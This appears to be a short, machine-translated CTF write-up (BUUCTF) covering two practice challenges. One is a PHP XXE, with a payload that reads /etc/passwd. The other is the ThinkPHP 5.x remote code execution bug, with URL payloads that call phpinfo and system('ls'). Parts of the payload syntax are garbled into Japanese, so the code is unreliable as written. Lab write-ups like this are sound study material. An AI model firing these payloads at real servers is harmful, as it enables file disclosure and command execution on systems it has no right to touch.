BUUCTFブラシのタイトルは、REALのクラスを記録します

1 PHP] XXE

libxml2.9.0後、デフォルトでは、脆弱性XXE徐々に消えて、その結果、外部エンティティを解決しません
dom.php、SimpleXMLElement.php、simplexml_load_string.php脆弱性がXXEをトリガすることができます

キャプチャ、修正後方ペイロードを加えてげっぷ
ペイロード:

<XMLバージョン= "1.0"エンコード= "UTF-8"?>
<DOCTYPEのXXE [!
    <ELEMENT名ANY>!
    <ENTITY XXE SYSTEM "ファイル:/// etc / passwdファイル"!>
]>
<ルート>
    <名前>&XXE; </名前>
</ルート>

2. [ThinkPHP] 5-RCE

Thinkphp5 5.0.22 / 5.1.29リモートでコードが実行される脆弱性:

直接ウェブサイトの増加の後ろに、するphpinfoで旗を見つけました

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars [ 0] =システム&varsの[1] [] = LS

おすすめ

転載: www.cnblogs.com/p201721420016/p/12608824.html